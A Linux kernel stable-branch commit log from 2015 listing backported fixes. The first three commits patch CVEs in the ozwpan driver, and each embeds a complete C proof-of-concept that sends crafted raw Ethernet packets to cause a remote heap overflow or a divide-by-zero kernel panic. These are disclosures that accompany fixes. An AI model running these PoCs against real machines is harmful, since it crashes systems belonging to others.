1. 09 Jun, 2015 6 commits
    • Jason A. Donenfeld's avatar
      ozwpan: Use proper check to prevent heap overflow · 38a6e7a8
      Jason A. Donenfeld authored
      commit d114b9fe upstream.
      
      Since elt->length is a u8, we can make this variable a u8. Then we can
      do proper bounds checking more easily. Without this, a potentially
      negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
      resulting in a remotely exploitable heap overflow with network
      supplied data.
      
      This could result in remote code execution. A PoC which obtains DoS
      follows below. It requires the ozprotocol.h file from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp) - 2
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(0),
      			.total_size = htole16(0),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Reference: CVE-2015-4002
      BugLink: https://bugs.launchpad.net/bugs/1463444Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      38a6e7a8
    • Jason A. Donenfeld's avatar
      ozwpan: divide-by-zero leading to panic · 0d0a85ee
      Jason A. Donenfeld authored
      commit 04bf464a upstream.
      
      A network supplied parameter was not checked before division, leading to
      a divide-by-zero. Since this happens in the softirq path, it leads to a
      crash. A PoC follows below, which requires the ozprotocol.h file from
      this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      		struct oz_elt oz_elt2;
      		struct oz_multiple_fixed oz_multiple_fixed;
      	} __packed packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 0,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		},
      		.oz_elt2 = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_multiple_fixed)
      		},
      		.oz_multiple_fixed = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_USB_ENDPOINT_DATA,
      			.endpoint = 0,
      			.format = OZ_DATA_F_MULTIPLE_FIXED,
      			.unit_size = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Reference: CVE-2015-4003
      BugLink: https://bugs.launchpad.net/bugs/1463445Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      0d0a85ee
    • Jason A. Donenfeld's avatar
      ozwpan: Use unsigned ints to prevent heap overflow · 527c8998
      Jason A. Donenfeld authored
      commit b1bb5b49 upstream.
      
      Using signed integers, the subtraction between required_size and offset
      could wind up being negative, resulting in a memcpy into a heap buffer
      with a negative length, resulting in huge amounts of network-supplied
      data being copied into the heap, which could potentially lead to remote
      code execution.. This is remotely triggerable with a magic packet.
      A PoC which obtains DoS follows below. It requires the ozprotocol.h file
      from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp)
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(2),
      			.total_size = htole16(1),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Reference: CVE-2015-4001
      BugLink: https://bugs.launchpad.net/bugs/1463442Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      527c8998
    • Jan Kara's avatar
      udf: Check length of extended attributes and allocation descriptors · 13312946
      Jan Kara authored
      commit 23b133bd upstream.
      
      Check length of extended attributes and allocation descriptors when
      loading inodes from disk. Otherwise corrupted filesystems could confuse
      the code and make the kernel oops.
      Reported-by: default avatarCarl Henrik Lunde <chlunde@ping.uio.no>
      Signed-off-by: default avatarJan Kara <jack@suse.cz>
      Reference: CVE-2015-4167
      BugLink: https://bugs.launchpad.net/bugs/1462173
      [ luis: used Ben's backport to 3.16:
        - use make_bad_inode() instead of returning error ]
      Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      13312946
    • Jan Kara's avatar
      udf: Remove repeated loads blocksize · 78a198ac
      Jan Kara authored
      commit 79144954 upstream.
      
      Store blocksize in a local variable in udf_fill_inode() since it is used
      a lot of times.
      Signed-off-by: default avatarJan Kara <jack@suse.cz>
      Reference: CVE-2015-4167
      BugLink: https://bugs.launchpad.net/bugs/1462173
      [ luis: used Ben's backport to 3.16: adjusted context ]
      Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      78a198ac
    • Tim Gardner's avatar
      scripts/sortextable: suppress warning: `relocs_size' may be used uninitialized · 267d8362
      Tim Gardner authored
      commit 7cbc0ea7 upstream.
      
      In file included from scripts/sortextable.c:194:0:
      scripts/sortextable.c: In function `main':
      scripts/sortextable.h:176:3: warning: `relocs_size' may be used uninitialized in this function [-Wmaybe-uninitialized]
         memset(relocs, 0, relocs_size);
         ^
      scripts/sortextable.h:106:6: note: `relocs_size' was declared here
        int relocs_size;
            ^
      In file included from scripts/sortextable.c:192:0:
      scripts/sortextable.h:176:3: warning: `relocs_size' may be used uninitialized in this function [-Wmaybe-uninitialized]
         memset(relocs, 0, relocs_size);
         ^
      scripts/sortextable.h:106:6: note: `relocs_size' was declared here
        int relocs_size;
            ^
      
      gcc 4.9.1
      Signed-off-by: default avatarTim Gardner <tim.gardner@canonical.com>
      Reviewed-by: default avatarJamie Iles <jamie.iles@oracle.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      267d8362
  2. 03 Jun, 2015 9 commits
  3. 01 Jun, 2015 2 commits
  4. 27 May, 2015 23 commits
    • Andreas Schwab's avatar
      powerpc: Add vr save/restore functions · d6bb2a19
      Andreas Schwab authored
      commit 8fe9c93e upstream.
      
      GCC 4.8 now generates out-of-line vr save/restore functions when
      optimizing for size.  They are needed for the raid6 altivec support.
      Signed-off-by: default avatarAndreas Schwab <schwab@linux-m68k.org>
      Signed-off-by: default avatarBenjamin Herrenschmidt <benh@kernel.crashing.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      d6bb2a19
    • Lukas Czerner's avatar
      ext4: fix data corruption caused by unwritten and delayed extents · 93db0c19
      Lukas Czerner authored
      commit d2dc317d upstream.
      
      Currently it is possible to lose whole file system block worth of data
      when we hit the specific interaction with unwritten and delayed extents
      in status extent tree.
      
      The problem is that when we insert delayed extent into extent status
      tree the only way to get rid of it is when we write out delayed buffer.
      However there is a limitation in the extent status tree implementation
      so that when inserting unwritten extent should there be even a single
      delayed block the whole unwritten extent would be marked as delayed.
      
      At this point, there is no way to get rid of the delayed extents,
      because there are no delayed buffers to write out. So when a we write
      into said unwritten extent we will convert it to written, but it still
      remains delayed.
      
      When we try to write into that block later ext4_da_map_blocks() will set
      the buffer new and delayed and map it to invalid block which causes
      the rest of the block to be zeroed loosing already written data.
      
      For now we can fix this by simply not allowing to set delayed status on
      written extent in the extent status tree. Also add WARN_ON() to make
      sure that we notice if this happens in the future.
      
      This problem can be easily reproduced by running the following xfs_io.
      
      xfs_io -f -c "pwrite -S 0xaa 4096 2048" \
                -c "falloc 0 131072" \
                -c "pwrite -S 0xbb 65536 2048" \
                -c "fsync" /mnt/test/fff
      
      echo 3 > /proc/sys/vm/drop_caches
      xfs_io -c "pwrite -S 0xdd 67584 2048" /mnt/test/fff
      
      This can be theoretically also reproduced by at random by running fsx,
      but it's not very reliable, though on machines with bigger page size
      (like ppc) this can be seen more often (especially xfstest generic/127)
      Signed-off-by: default avatarLukas Czerner <lczerner@redhat.com>
      Signed-off-by: default avatarTheodore Ts'o <tytso@mit.edu>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      93db0c19
    • Thomas D's avatar
      tools/power turbostat: Use $(CURDIR) instead of $(PWD) and add support for O= option in Makefile · fd8b6562
      Thomas D authored
      commit f82263c6 upstream.
      
      Since commit ee0778a3
      ("tools/power: turbostat: make Makefile a bit more capable")
      turbostat's Makefile is using
      
        [...]
        BUILD_OUTPUT    := $(PWD)
        [...]
      
      which obviously causes trouble when building "turbostat" with
      
        make -C /usr/src/linux/tools/power/x86/turbostat ARCH=x86 turbostat
      
      because GNU make does not update nor guarantee that $PWD is set.
      
      This patch changes the Makefile to use $CURDIR instead, which GNU make
      guarantees to set and update (i.e. when using "make -C ...") and also
      adds support for the O= option (see "make help" in your root of your
      kernel source tree for more details).
      
      Link: https://bugs.gentoo.org/show_bug.cgi?id=533918
      Fixes: ee0778a3 ("tools/power: turbostat: make Makefile a bit more capable")
      Signed-off-by: default avatarThomas D. <whissi@whissi.de>
      Cc: Mark Asselstine <mark.asselstine@windriver.com>
      Signed-off-by: default avatarLen Brown <len.brown@intel.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      fd8b6562
    • Dan Carpenter's avatar
      memstick: mspro_block: add missing curly braces · b1ce2bd4
      Dan Carpenter authored
      commit 13f6b191 upstream.
      
      Using the indenting we can see the curly braces were obviously intended.
      This is a static checker fix, but my guess is that we don't read enough
      bytes, because we don't calculate "t_len" correctly.
      
      Fixes: f1d82698 ('memstick: use fully asynchronous request processing')
      Signed-off-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Cc: Alex Dubov <oakad@yahoo.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      b1ce2bd4
    • Nicolas Iooss's avatar
      firmware/ihex2fw.c: restore missing default in switch statement · 204dec04
      Nicolas Iooss authored
      commit d43698e8 upstream.
      
      Commit 2473238e ("ihex: add support for CS:IP/EIP records") removes
      the "default:" statement in the switch block, making the "return
      usage();" line dead code and ihex2fw silently ignoring unknown options.
      Restore this statement.
      
      This bug was found by building with HOSTCC=clang and adding
      -Wunreachable-code-return to HOSTCFLAGS.
      
      Fixes: 2473238e ("ihex: add support for CS:IP/EIP records")
      Signed-off-by: default avatarNicolas Iooss <nicolas.iooss_linux@m4x.org>
      Cc: Mark Brown <broonie@opensource.wolfsonmicro.com>
      Cc: David Woodhouse <dwmw2@infradead.org>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      204dec04
    • Herbert Xu's avatar
      skbuff: Do not scrub skb mark within the same name space · 615e3227
      Herbert Xu authored
      commit 213dd74a upstream.
      
      On Wed, Apr 15, 2015 at 05:41:26PM +0200, Nicolas Dichtel wrote:
      > Le 15/04/2015 15:57, Herbert Xu a écrit :
      > >On Wed, Apr 15, 2015 at 06:22:29PM +0800, Herbert Xu wrote:
      > [snip]
      > >Subject: skbuff: Do not scrub skb mark within the same name space
      > >
      > >The commit ea23192e ("tunnels:
      > Maybe add a Fixes tag?
      > Fixes: ea23192e ("tunnels: harmonize cleanup done on skb on rx path")
      >
      > >harmonize cleanup done on skb on rx path") broke anyone trying to
      > >use netfilter marking across IPv4 tunnels.  While most of the
      > >fields that are cleared by skb_scrub_packet don't matter, the
      > >netfilter mark must be preserved.
      > >
      > >This patch rearranges skb_scurb_packet to preserve the mark field.
      > nit: s/scurb/scrub
      >
      > Else it's fine for me.
      
      Sure.
      
      PS I used the wrong email for James the first time around.  So
      let me repeat the question here.  Should secmark be preserved
      or cleared across tunnels within the same name space? In fact,
      do our security models even support name spaces?
      
      ---8<---
      The commit ea23192e ("tunnels:
      harmonize cleanup done on skb on rx path") broke anyone trying to
      use netfilter marking across IPv4 tunnels.  While most of the
      fields that are cleared by skb_scrub_packet don't matter, the
      netfilter mark must be preserved.
      
      This patch rearranges skb_scrub_packet to preserve the mark field.
      
      Fixes: ea23192e ("tunnels: harmonize cleanup done on skb on rx path")
      Signed-off-by: default avatarHerbert Xu <herbert@gondor.apana.org.au>
      Acked-by: default avatarThomas Graf <tgraf@suug.ch>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      [ luis: backported to 3.16: adjusted context ]
      Signed-off-by: default avatarLuis Henriques <luis.henriques@canonical.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      615e3227
    • Honggang LI's avatar
      mlx5: wrong page mask if CONFIG_ARCH_DMA_ADDR_T_64BIT enabled for 32Bit architectures · 96858104
      Honggang LI authored
      commit 59d2d18c upstream.
      
      If CONFIG_ARCH_DMA_ADDR_T_64BIT enabled for x86 systems and physical
      memory is more than 4GB, dma_map_page may return a valid memory
      address which greater than 0xffffffff. As a result, the mlx5 device page
      allocator RB tree will be initialized with valid addresses greater than
      0xfffffff.
      
      However, (addr & PAGE_MASK) set the high four bytes to zeros. So, it's
      impossible for the function, free_4k, to release the pages whose
      addresses greater than 4GB. Memory leaks. And mlx5_ib module can't
      release the pages when user try to remove the module, as a result,
      system hang.
      
      [root@rdma05 root]# dmesg  | grep addr | head
      addr             = 3fe384000
      addr & PAGE_MASK =  fe384000
      [root@rdma05 root]# rmmod mlx5_ib   <---- hang on
      
      ---------------------- cosnole log -----------------
      mlx5_ib 0000:04:00.0: irq 138 for MSI/MSI-X
        alloc irq_desc for 139 on node -1
        alloc kstat_irqs on node -1
      mlx5_ib 0000:04:00.0: irq 139 for MSI/MSI-X
      0000:04:00.0:free_4k:221:(pid 1519): page not found
      0000:04:00.0:free_4k:221:(pid 1519): page not found
      0000:04:00.0:free_4k:221:(pid 1519): page not found
      0000:04:00.0:free_4k:221:(pid 1519): page not found
      ---------------------- cosnole log -----------------
      
      Fixes: bf0bf77f ('mlx5: Support communicating arbitrary host page size to firmware')
      Signed-off-by: default avatarHonggang Li <honli@redhat.com>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      96858104
    • Eli Cohen's avatar
      mlx5_core: Fix PowerPC support · 4636c5f9
      Eli Cohen authored
      commit 05bdb2ab upstream.
      
      1. Fix derivation of sub-page index from the dma address in free_4k.
      2. Fix the DMA address passed to dma_unmap_page by masking it properly.
      Signed-off-by: default avatarEli Cohen <eli@mellanox.com>
      Signed-off-by: default avatarRoland Dreier <roland@purestorage.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      4636c5f9
    • Erez Shitrit's avatar
      IB/mlx4: Fix WQE LSO segment calculation · c8bf722e
      Erez Shitrit authored
      commit ca9b590c upstream.
      
      The current code decreases from the mss size (which is the gso_size
      from the kernel skb) the size of the packet headers.
      
      It shouldn't do that because the mss that comes from the stack
      (e.g IPoIB) includes only the tcp payload without the headers.
      
      The result is indication to the HW that each packet that the HW sends
      is smaller than what it could be, and too many packets will be sent
      for big messages.
      
      An easy way to demonstrate one more aspect of the problem is by
      configuring the ipoib mtu to be less than 2*hlen (2*56) and then
      run app sending big TCP messages. This will tell the HW to send packets
      with giant (negative value which under unsigned arithmetics becomes
      a huge positive one) length and the QP moves to SQE state.
      
      Fixes: b832be1e ('IB/mlx4: Add IPoIB LSO support')
      Reported-by: default avatarMatthew Finlay <matt@mellanox.com>
      Signed-off-by: default avatarErez Shitrit <erezsh@mellanox.com>
      Signed-off-by: default avatarOr Gerlitz <ogerlitz@mellanox.com>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      c8bf722e
    • Mark Brown's avatar
      i2c: core: Export bus recovery functions · bccbeee0
      Mark Brown authored
      commit c1c21f4e upstream.
      
      Current -next fails to link an ARM allmodconfig because drivers that use
      the core recovery functions can be built as modules but those functions
      are not exported:
      
      ERROR: "i2c_generic_gpio_recovery" [drivers/i2c/busses/i2c-davinci.ko] undefined!
      ERROR: "i2c_generic_scl_recovery" [drivers/i2c/busses/i2c-davinci.ko] undefined!
      ERROR: "i2c_recover_bus" [drivers/i2c/busses/i2c-davinci.ko] undefined!
      
      Add exports to fix this.
      
      Fixes: 5f9296ba (i2c: Add bus recovery infrastructure)
